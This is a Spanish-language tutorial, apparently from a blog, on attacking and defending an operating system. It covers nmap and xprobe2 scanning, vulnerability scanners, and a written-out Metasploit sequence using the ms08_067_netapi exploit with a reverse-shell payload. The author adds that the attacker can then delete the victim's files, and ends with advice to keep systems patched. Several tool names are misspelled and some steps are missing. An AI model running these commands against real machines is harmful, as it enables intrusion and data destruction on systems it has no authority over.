Ataque y defensa de un Sistema Operativo

Atacar y defender un sistema operativo, para nosotros, ¿Es bueno saber atacar? Desde luego que sí, al menos desde nuestro punto de vista, el de un administrador de sistemas, no hay mejor ataque que una buena defensa, si sabemos como atacar sabremos defender nuestros sistemas. Antes de empezar con la explicación, me gustaría hacer una aclaración de términos que mucha gente confunde, el hacker no es malo, el hacker es lo más parecido a un administrador de sistemas, si el hacker encuentra una vulnerabilidad la notificará y en el mundo de linux son muchas veces quienes la reparan, entoncesa, ¿quien es el malo? el malo es el cracker que es quien aprovecha una vulnerabilidad para sacar provecho de ella, ya sea económico, político, etc.

Lo primero que debemos hacer para atacar/defender un sistema es averiguar los puertos que tiene abiertos, eso nos servirá para atacar y también nos servirá para defender mejor el sistema cerrando los puertos que no necesiten estar abiertos, para analizar los puertos usaremos la aplicación nmap (en su versión de consola nmpa o interfaz gráfica nampfe)

Para instalar usaremos los repósitos:

Debian: aptitude install nmap y nmapfe

Ubuntu: apt-get install namp y nampfe

Para usar la aplicación tenemos dos formas, en consola escribir nmap -Ip a analizar-  o podemos abrir nmapfe y usar la interfaz gráfica que es mucho más sencilla.

Esta aplicación aparte de darnos los puertos abiertos del sistema, nos va a proporcionar el sistema operativo que tiene instalado esa IP, que es totalmente necesario para poder continuar con el ataque/defensa del sistema. Para averiguar el S.O que hay instalado en una ip (aparte de usar el nmap/nmapfe) podemos usar el xprobe2, que es muy sencillo de usar, abrimos un terminar y escribimos en el «xprobe2 -IP a analizar» , para instalar xprobe2 ponemos en el terminal:

Una vez que sepamos el sistema operativo que está usando ese equipo (si vamos a defender este dato ya lo sabríamos, pero para un atacante es necesario averiguarlo mediante el nmap o el xprobe2 para poder atacar) pasamos a usar un escaneador de vulnerabilidades de sistemas, que nos dirá los puntos débiles del sistema operativo que está instalado en el equipo con esa IP, hay muchísimos los mejores son el MBSA , nessus y openvas, el primero es para analizar plataformas windows y los otros dos son para analizar multiplataformas (unix, windows y mac). Los analizadores son muy fáciles de usar, lo ejecutamos, ponemos la dirección ip del equipo que queremos analizar y listo, esperamos a que haga el escaner y nos dé los puntos débiles del sistema y sabiendo los puntos débiles usamos un exploit u otro. En este caso vamos a utilizar el MBSA (que lo podemos descargar de la página oficial de Microsoft – Pinchando aquí -).

Una vez que tenemos las vulnerabilidades del sistema, nos ponemos a buscar los exploits que mejor nos convengan para explotar las vulnerabilidades del sistema, para ello usaremos el metasploit, el mejor programa de exploits que hay.

Nos bajamos el metasploit de la página oficial (www.metasploit.com) y lo instalamos, ahora abrimos la consola de metasploit que se nos acaba de instalar (la ejecutamos como administrador) y nos aparecerá una pantalla como esta:

Usar el Metasploit es muy sencillo, solo es necesario saber 4 comandos básicos:

  • use exploit(nombre del exploit a usar)
  • set RHOST  (Ip que vamos a atacar)
  • set payload windows/shell/reverse_tcp
  • set LHOST (nuestra IP/ Ip atacante)
  • exploit
Para saber el nombre de los exploits y para que sirver es tan sencillo como ir a la página web de metasploit, ir al apartado de exploits y buscamos uno que se adapte a las vulnerabilidades que hayamos descubierto, nada más entrar en el exploit que queramos nos mostrarán una captura de pantalla de como usarlo en la consola, los exploits básicos se usan con estos 4 comandos, algunos exploits pueden usar otros comandos distintos o añadir alguno especial como por ejemplo para cambiar el puerto de ataque.

Ejemplo: En este ejemplo usaremos este exploit que lo que hace es que nos colamos en otro pc y nos abre una consola en system32, y podemos navegar por la consola y hacer lo que queramos como por ejemplo borrar archivos (de sistema y personales) 
  • use exploit/windows/smb/ms08_067_netapi
  • set RHOST 255.255.255.255
  • set payload windows/shell/reverse_tcp
  • set LHOST 255.255.255.255
  • exploit (y nada más dar al intro lanzaremos el exploit)
Modo de uso en mestasploit:
Y ya estamos dentro….
Por último, lo mejor que hay para evitar ataques por exploits es tener el S.O siempre actualizado con las últimas actualizaciones disponibles, ya que estas corregirán las últimas vulnerabilidades encontradas, pero aún así no estaremos seguros al 100%. Dentro de poco subiré un vídeo explicativo del ataque.